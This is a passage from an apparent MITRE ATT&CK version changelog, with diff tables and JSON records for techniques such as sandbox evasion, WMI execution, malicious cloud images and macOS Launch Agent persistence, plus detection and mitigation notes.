| > | content. This can be done by either executing a new or modif | > | and <code>sc.exe</code> can accept remote servers as argumen | ||
| > | ied service. This technique is the execution used in conjunc | > | ts and may be used to conduct remote execution. Adversaries | ||
| > | tion with [Windows Service](https://attack.mitre.org/techniq | > | may leverage these mechanisms to execute malicious content. | ||
| > | ues/T1543/003) during service persistence or privilege escal | > | This can be done by either executing a new or modified serv | ||
| > | ation. | > | ice. This technique is the execution used in conjunction wit | ||
| > | h [Windows Service](https://attack.mitre.org/techniques/T154 | ||||
| > | 3/003) during service persistence or privilege escalation. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may rely on a user running a malicious image to | t | 1 | Adversaries may rely on a user running a malicious image to |
| > | facilitate execution. Amazon Web Services (AWS) Amazon Machi | > | facilitate execution. Amazon Web Services (AWS) Amazon Machi | ||
| > | ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az | > | ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az | ||
| > | ure Images as well as popular container runtimes such as Doc | > | ure Images as well as popular container runtimes such as Doc | ||
| > | ker can be backdoored. Backdoored images may be uploaded to | > | ker can be backdoored. Backdoored images may be uploaded to | ||
| > | a public repository via [Upload Malware](https://attack.mitr | > | a public repository via [Upload Malware](https://attack.mitr | ||
| > | e.org/techniques/T1608/001), and users may then download and | > | e.org/techniques/T1608/001), and users may then download and | ||
| > | deploy an instance or container from the image without real | > | deploy an instance or container from the image without real | ||
| > | izing the image is malicious, thus bypassing techniques that | > | izing the image is malicious, thus bypassing techniques that | ||
| > | specifically achieve Initial Access. This can lead to the e | > | specifically achieve Initial Access. This can lead to the e | ||
| > | xecution of malicious code, such as code that executes crypt | > | xecution of malicious code, such as code that executes crypt | ||
| > | ocurrency mining, in the instance or container.(Citation: Su | > | ocurrency mining, in the instance or container.(Citation: Su | ||
| > | mmit Route Malicious AMIs) Adversaries may also name images | > | mmit Route Malicious AMIs) Adversaries may also name images | ||
| > | a certain way to increase the chance of users mistakenly de | > | a certain way to increase the chance of users mistakenly de | ||
| > | ploying an instance or container from the image (ex: [Match | > | ploying an instance or container from the image (ex: [Match | ||
| > | Legitimate Name or Location](https://attack.mitre.org/techni | > | Legitimate Name or Location](https://attack.mitre.org/techni | ||
| > | ques/T1036/005)). | > | ques/T1036/005)).(Citation: Aqua Security Cloud Native Threa | ||
| > | t Report June 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may employ various means to detect and avoid vir | t | 1 | Adversaries may employ various means to detect and avoid vir |
| > | tualization and analysis environments. This may include chan | > | tualization and analysis environments. This may include chan | ||
| > | ging behaviors based on the results of checks for the presen | > | ging behaviors based on the results of checks for the presen | ||
| > | ce of artifacts indicative of a virtual machine environment | > | ce of artifacts indicative of a virtual machine environment | ||
| > | (VME) or sandbox. If the adversary detects a VME, they may a | > | (VME) or sandbox. If the adversary detects a VME, they may a | ||
| > | lter their malware to disengage from the victim or conceal t | > | lter their malware to disengage from the victim or conceal t | ||
| > | he core functions of the implant. They may also search for V | > | he core functions of the implant. They may also search for V | ||
| > | ME artifacts before dropping secondary or additional payload | > | ME artifacts before dropping secondary or additional payload | ||
| > | s. Adversaries may use the information learned from [Virtual | > | s. Adversaries may use the information learned from [Virtual | ||
| > | ization/Sandbox Evasion](https://attack.mitre.org/techniques | > | ization/Sandbox Evasion](https://attack.mitre.org/techniques | ||
| > | /T1497) during automated discovery to shape follow-on behavi | > | /T1497) during automated discovery to shape follow-on behavi | ||
| > | ors. Adversaries may use several methods to accomplish [Vi | > | ors.(Citation: Deloitte Environment Awareness) Adversaries | ||
| > | rtualization/Sandbox Evasion](https://attack.mitre.org/techn | > | may use several methods to accomplish [Virtualization/Sandbo | ||
| > | iques/T1497) such as checking for security monitoring tools | > | x Evasion](https://attack.mitre.org/techniques/T1497) such a | ||
| > | (e.g., Sysinternals, Wireshark, etc.) or other system artifa | > | s checking for security monitoring tools (e.g., Sysinternals | ||
| > | cts associated with analysis or virtualization. Adversaries | > | , Wireshark, etc.) or other system artifacts associated with | ||
| > | may also check for legitimate user activity to help determin | > | analysis or virtualization. Adversaries may also check for | ||
| > | e if it is in an analysis environment. Additional methods in | > | legitimate user activity to help determine if it is in an an | ||
| > | clude use of sleep timers or loops within malware code to av | > | alysis environment. Additional methods include use of sleep | ||
| > | oid operating within a temporary sandbox.(Citation: Unit 42 | > | timers or loops within malware code to avoid operating withi | ||
| > | Pirpi July 2015) | > | n a temporary sandbox.(Citation: Unit 42 Pirpi July 2015) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may employ various system checks to detect and a | t | 1 | Adversaries may employ various system checks to detect and a |
| > | void virtualization and analysis environments. This may incl | > | void virtualization and analysis environments. This may incl | ||
| > | ude changing behaviors based on the results of checks for th | > | ude changing behaviors based on the results of checks for th | ||
| > | e presence of artifacts indicative of a virtual machine envi | > | e presence of artifacts indicative of a virtual machine envi | ||
| > | ronment (VME) or sandbox. If the adversary detects a VME, th | > | ronment (VME) or sandbox. If the adversary detects a VME, th | ||
| > | ey may alter their malware to disengage from the victim or c | > | ey may alter their malware to disengage from the victim or c | ||
| > | onceal the core functions of the implant. They may also sear | > | onceal the core functions of the implant. They may also sear | ||
| > | ch for VME artifacts before dropping secondary or additional | > | ch for VME artifacts before dropping secondary or additional | ||
| > | payloads. Adversaries may use the information learned from | > | payloads. Adversaries may use the information learned from | ||
| > | [Virtualization/Sandbox Evasion](https://attack.mitre.org/te | > | [Virtualization/Sandbox Evasion](https://attack.mitre.org/te | ||
| > | chniques/T1497) during automated discovery to shape follow-o | > | chniques/T1497) during automated discovery to shape follow-o | ||
| > | n behaviors. Specific checks will vary based on the target | > | n behaviors.(Citation: Deloitte Environment Awareness) Spec | ||
| > | and/or adversary, but may involve behaviors such as [Window | > | ific checks will vary based on the target and/or adversary, | ||
| > | s Management Instrumentation](https://attack.mitre.org/techn | > | but may involve behaviors such as [Windows Management Instru | ||
| > | iques/T1047), [PowerShell](https://attack.mitre.org/techniqu | > | mentation](https://attack.mitre.org/techniques/T1047), [Powe | ||
| > | es/T1059/001), [System Information Discovery](https://attack | > | rShell](https://attack.mitre.org/techniques/T1059/001), [Sys | ||
| > | .mitre.org/techniques/T1082), and [Query Registry](https://a | > | tem Information Discovery](https://attack.mitre.org/techniqu | ||
| > | ttack.mitre.org/techniques/T1012) to obtain system informati | > | es/T1082), and [Query Registry](https://attack.mitre.org/tec | ||
| > | on and search for VME artifacts. Adversaries may search for | > | hniques/T1012) to obtain system information and search for V | ||
| > | VME artifacts in memory, processes, file system, hardware, a | > | ME artifacts. Adversaries may search for VME artifacts in me | ||
| > | nd/or the Registry. Adversaries may use scripting to automat | > | mory, processes, file system, hardware, and/or the Registry. | ||
| > | e these checks into one script and then have the program ex | > | Adversaries may use scripting to automate these checks int | ||
| > | it if it determines the system to be a virtual environment. | > | o one script and then have the program exit if it determines | ||
| > | Checks could include generic system properties such as hos | > | the system to be a virtual environment. Checks could incl | ||
| > | t/domain name and samples of network traffic. Adversaries ma | > | ude generic system properties such as host/domain name and s | ||
| > | y also check the network adapters addresses, CPU core count, | > | amples of network traffic. Adversaries may also check the ne | ||
| > | and available memory/drive size. Other common checks may | > | twork adapters addresses, CPU core count, and available memo | ||
| > | enumerate services running that are unique to these applicat | > | ry/drive size. Other common checks may enumerate services | ||
| > | ions, installed programs on the system, manufacturer/product | > | running that are unique to these applications, installed pro | ||
| > | fields for strings relating to virtual machine applications | > | grams on the system, manufacturer/product fields for strings | ||
| > | , and VME-specific hardware/processor instructions.(Citation | > | relating to virtual machine applications, and VME-specific | ||
| > | : McAfee Virtual Jan 2017) In applications like VMWare, adve | > | hardware/processor instructions.(Citation: McAfee Virtual Ja | ||
| > | rsaries can also use a special I/O port to send commands and | > | n 2017) In applications like VMWare, adversaries can also us | ||
| > | receive output. Hardware checks, such as the presence of | > | e a special I/O port to send commands and receive output. | ||
| > | the fan, temperature, and audio devices, could also be used | > | Hardware checks, such as the presence of the fan, temperatu | ||
| > | to gather evidence that can be indicative a virtual environ | > | re, and audio devices, could also be used to gather evidence | ||
| > | ment. Adversaries may also query for specific readings from | > | that can be indicative a virtual environment. Adversaries m | ||
| > | these devices.(Citation: Unit 42 OilRig Sept 2018) | > | ay also query for specific readings from these devices.(Cita | ||
| > | tion: Unit 42 OilRig Sept 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may employ various time-based methods to detect | t | 1 | Adversaries may employ various time-based methods to detect |
| > | and avoid virtualization and analysis environments. This may | > | and avoid virtualization and analysis environments. This may | ||
| > | include enumerating time-based properties, such as uptime o | > | include enumerating time-based properties, such as uptime o | ||
| > | r the system clock, as well as the use of timers or other tr | > | r the system clock, as well as the use of timers or other tr | ||
| > | iggers to avoid a virtual machine environment (VME) or sandb | > | iggers to avoid a virtual machine environment (VME) or sandb | ||
| > | ox, specifically those that are automated or only operate fo | > | ox, specifically those that are automated or only operate fo | ||
| > | r a limited amount of time. Adversaries may employ various | > | r a limited amount of time. Adversaries may employ various | ||
| > | time-based evasions, such as delaying malware functionality | > | time-based evasions, such as delaying malware functionality | ||
| > | upon initial execution using programmatic sleep commands or | > | upon initial execution using programmatic sleep commands or | ||
| > | native system scheduling functionality (ex: [Scheduled Task/ | > | native system scheduling functionality (ex: [Scheduled Task/ | ||
| > | Job](https://attack.mitre.org/techniques/T1053)). Delays may | > | Job](https://attack.mitre.org/techniques/T1053)). Delays may | ||
| > | also be based on waiting for specific victim conditions to | > | also be based on waiting for specific victim conditions to | ||
| > | be met (ex: system time, events, etc.) or employ scheduled [ | > | be met (ex: system time, events, etc.) or employ scheduled [ | ||
| > | Multi-Stage Channels](https://attack.mitre.org/techniques/T1 | > | Multi-Stage Channels](https://attack.mitre.org/techniques/T1 | ||
| > | 104) to avoid analysis and scrutiny. Adversaries may also u | > | 104) to avoid analysis and scrutiny.(Citation: Deloitte Envi | ||
| > | se time as a metric to detect sandboxes and analysis environ | > | ronment Awareness) Benign commands or other operations may | ||
| > | ments, particularly those that attempt to manipulate time me | > | also be used to delay malware execution. Loops or otherwise | ||
| > | chanisms to simulate longer elapses of time. For example, an | > | needless repetitions of commands, such as [Ping](https://att | ||
| > | adversary may be able to identify a sandbox accelerating ti | > | ack.mitre.org/software/S0097)s, may be used to delay malware | ||
| > | me by sampling and calculating the expected value for an env | > | execution and potentially exceed time thresholds of automat | ||
| > | ironment's timestamp before and after execution of a sleep f | > | ed analysis environments.(Citation: Revil Independence Day)( | ||
| > | unction.(Citation: ISACA Malware Tricks) | > | Citation: Netskope Nitol) Another variation, commonly referr | ||
| > | ed to as API hammering, involves making various calls to [Na | ||||
| > | tive API](https://attack.mitre.org/techniques/T1106) functio | ||||
| > | ns in order to delay execution (while also potentially overl | ||||
| > | oading analysis environments with junk data).(Citation: Joe | ||||
| > | Sec Nymaim)(Citation: Joe Sec Trickbot) Adversaries may als | ||||
| > | o use time as a metric to detect sandboxes and analysis envi | ||||
| > | ronments, particularly those that attempt to manipulate time | ||||
| > | mechanisms to simulate longer elapses of time. For example, | ||||
| > | an adversary may be able to identify a sandbox accelerating | ||||
| > | time by sampling and calculating the expected value for an | ||||
| > | environment's timestamp before and after execution of a slee | ||||
| > | p function.(Citation: ISACA Malware Tricks) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may employ various user activity checks to detec | t | 1 | Adversaries may employ various user activity checks to detec |
| > | t and avoid virtualization and analysis environments. This m | > | t and avoid virtualization and analysis environments. This m | ||
| > | ay include changing behaviors based on the results of checks | > | ay include changing behaviors based on the results of checks | ||
| > | for the presence of artifacts indicative of a virtual machi | > | for the presence of artifacts indicative of a virtual machi | ||
| > | ne environment (VME) or sandbox. If the adversary detects a | > | ne environment (VME) or sandbox. If the adversary detects a | ||
| > | VME, they may alter their malware to disengage from the vict | > | VME, they may alter their malware to disengage from the vict | ||
| > | im or conceal the core functions of the implant. They may al | > | im or conceal the core functions of the implant. They may al | ||
| > | so search for VME artifacts before dropping secondary or add | > | so search for VME artifacts before dropping secondary or add | ||
| > | itional payloads. Adversaries may use the information learne | > | itional payloads. Adversaries may use the information learne | ||
| > | d from [Virtualization/Sandbox Evasion](https://attack.mitre | > | d from [Virtualization/Sandbox Evasion](https://attack.mitre | ||
| > | .org/techniques/T1497) during automated discovery to shape f | > | .org/techniques/T1497) during automated discovery to shape f | ||
| > | ollow-on behaviors. Adversaries may search for user activi | > | ollow-on behaviors.(Citation: Deloitte Environment Awareness | ||
| > | ty on the host based on variables such as the speed/frequenc | > | ) Adversaries may search for user activity on the host base | ||
| > | y of mouse movements and clicks (Citation: Sans Virtual Jan | > | d on variables such as the speed/frequency of mouse movement | ||
| > | 2016) , browser history, cache, bookmarks, or number of file | > | s and clicks (Citation: Sans Virtual Jan 2016) , browser his | ||
| > | s in common directories such as home or the desktop. Other m | > | tory, cache, bookmarks, or number of files in common directo | ||
| > | ethods may rely on specific user interaction with the system | > | ries such as home or the desktop. Other methods may rely on | ||
| > | before the malicious code is activated, such as waiting for | > | specific user interaction with the system before the malicio | ||
| > | a document to close before activating a macro (Citation: Un | > | us code is activated, such as waiting for a document to clos | ||
| > | it 42 Sofacy Nov 2018) or waiting for a user to double click | > | e before activating a macro (Citation: Unit 42 Sofacy Nov 20 | ||
| > | on an embedded image to activate.(Citation: FireEye FIN7 Ap | > | 18) or waiting for a user to double click on an embedded ima | ||
| > | ril 2017) | > | ge to activate.(Citation: FireEye FIN7 April 2017) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse Windows Management Instrumentation (WM | t | 1 | Adversaries may abuse Windows Management Instrumentation (WM |
| > | I) to achieve execution. WMI is a Windows administration fea | > | I) to execute malicious commands and payloads. WMI is an adm | ||
| > | ture that provides a uniform environment for local and remot | > | inistration feature that provides a uniform environment to a | ||
| > | e access to Windows system components. It relies on the WMI | > | ccess Windows system components. The WMI service enables bot | ||
| > | service for local and remote access and the server message b | > | h local and remote access, though the latter is facilitated | ||
| > | lock (SMB) (Citation: Wikipedia SMB) and Remote Procedure Ca | > | by [Remote Services](https://attack.mitre.org/techniques/T10 | ||
| > | ll Service (RPCS) (Citation: TechNet RPC) for remote access. | > | 21) such as [Distributed Component Object Model](https://att | ||
| > | RPCS operates over port 135. (Citation: MSDN WMI) An adver | > | ack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remo | ||
| > | sary can use WMI to interact with local and remote systems a | > | te Management](https://attack.mitre.org/techniques/T1021/006 | ||
| > | nd use it as a means to perform many tactic functions, such | > | ) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operate | ||
| > | as gathering information for Discovery and remote Execution | > | s using port 135, whereas WMI over WinRM operates over port | ||
| > | of files as part of Lateral Movement. (Citation: FireEye WMI | > | 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI | ||
| > | SANS 2015) (Citation: FireEye WMI 2015) | > | ) (Citation: FireEye WMI 2015) An adversary can use WMI to | ||
| > | interact with local and remote systems and use it as a means | ||||
| > | to execute various behaviors, such as gathering information | ||||
| > | for Discovery as well as remote Execution of files as part | ||||
| > | of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Cita | ||||
| > | tion: FireEye WMI 2015) |
HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-28 13:09:50.809000+00:00\", \"old_value\": \"2020-03-31 13:54:08.239000+00:00\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"Network Traffic: Network Traffic Content\", \"old_value\": \"Network Traffic: Network Traffic Flow\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1030: Network Segmentation",
"M1031: Network Intrusion Prevention",
"M1037: Filter Network Traffic",
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0019: Service (Service Creation)",
"DS0024: Windows Registry (Windows Registry Key Modification)",
"DS0029: Network Traffic (Network Traffic Content)",
"DS0029: Network Traffic (Network Traffic Flow)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-17 16:10:58.592000+00:00",
"modified": "2021-10-15 07:41:40.262000+00:00",
"name": "Launch Agent",
"description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1543/001",
"external_id": "T1543.001"
},
{
"source_name": "AppleDocs Launch Agent Daemons",
"description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
"url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
},
{
"source_name": "OSX Keydnap malware",
"description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
"url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
},
{
"source_name": "Antiquated Mac Malware",
"description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.",
"url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
},
{
"source_name": "OSX.Dok Malware",
"description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.",
"url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"
},
{
"source_name": "Sofacy Komplex Trojan",
"description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
},
{
"source_name": "Methods of Mac Malware Persistence",
"description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
},
{
"source_name": "OSX Malware Detection",
"description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.",
"url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"
},
{
"source_name": "OceanLotus for OS X",
"description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.",
"url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Creation",
"File: File Modification",
"Command: Command Execution",
"Service: Service Creation",
"Service: Service Modification"
],
"x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 07:41:40.262000+00:00\", \"old_value\": \"2020-03-25 22:11:45.513000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\\n\\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\\n \\nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) \", \"old_value\": \"Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple\\u2019s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).\\n \\nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user\\u2019s directory structure) or when any user logs in (which requires administrator privileges).\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n-Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple\\u2019s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).\\n+Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\\n+\\n+ Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\\n \\n-Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user\\u2019s directory structure) or when any user logs in (which requires administrator privileges).\\n+Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) \"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\\n\\nEnsure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. \", \"old_value\": \"Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\\n+\\n+Ensure Launch Agent's ProgramArguments key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may create or modify launch agents to repeatedly | t | 1 | Adversaries may create or modify launch agents to repeatedly |
| > | execute malicious payloads as part of persistence. Per Appl | > | execute malicious payloads as part of persistence. When a u | ||
| > | e\u2019s developer documentation, when a user logs in, a per-user | > | ser logs in, a per-user launchd process is started which loa | ||
| > | launchd process is started which loads the parameters for e | > | ds the parameters for each launch-on-demand user agent from | ||
| > | ach launch-on-demand user agent from the property list (plis | > | the property list (.plist) file found in <code>/System/Libra | ||
| > | t) files found in <code>/System/Library/LaunchAgents</code>, | > | ry/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, | ||
| > | <code>/Library/LaunchAgents</code>, and <code>$HOME/Library | > | and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs | ||
| > | /LaunchAgents</code> (Citation: AppleDocs Launch Agent Daemo | > | Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citat | ||
| > | ns) (Citation: OSX Keydnap malware) (Citation: Antiquated Ma | > | ion: Antiquated Mac Malware) Property list files use the <co | ||
| > | c Malware). These launch agents have property list files whi | > | de>Label</code>, <code>ProgramArguments </code>, and <code>R | ||
| > | ch point to the executables that will be launched (Citation: | > | unAtLoad</code> keys to identify the Launch Agent's name, ex | ||
| > | OSX.Dok Malware). Adversaries may install a new launch ag | > | ecutable location, and execution time.(Citation: OSX.Dok Mal | ||
| > | ent that can be configured to execute at login by using laun | > | ware) Launch Agents are often installed to perform updates t | ||
| > | chd or launchctl to load a plist into the appropriate direct | > | o programs, launch user specified programs at login, or to c | ||
| > | ories (Citation: Sofacy Komplex Trojan) (Citation: Methods | > | onduct other developer tasks. Launch Agents can also be ex | ||
| > | of Mac Malware Persistence). The agent name may be disguise | > | ecuted using the [Launchctl](https://attack.mitre.org/techni | ||
| > | d by using a name from a related operating system or benign | > | ques/T1569/001) command. Adversaries may install a new Lau | ||
| > | software. Launch Agents are created with user level privileg | > | nch Agent that executes at login by placing a .plist file in | ||
| > | es and are executed with the privileges of the user when the | > | to the appropriate folders with the <code>RunAtLoad</code> o | ||
| > | y log in (Citation: OSX Malware Detection) (Citation: OceanL | > | r <code>KeepAlive</code> keys set to <code>true</code>.(Cita | ||
| > | otus for OS X). They can be set up to execute when a specifi | > | tion: Sofacy Komplex Trojan)(Citation: Methods of Mac Malwar | ||
| > | c user logs in (in the specific user\u2019s directory structure) | > | e Persistence) The Launch Agent name may be disguised by usi | ||
| > | or when any user logs in (which requires administrator privi | > | ng a name from the related operating system or benign softwa | ||
| > | leges). | > | re. Launch Agents are created with user level privileges and | ||
| > | execute with user level permissions.(Citation: OSX Malware | ||||
| > | Detection)(Citation: OceanLotus for OS X) |
runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
"kill_chain_phases": [
{
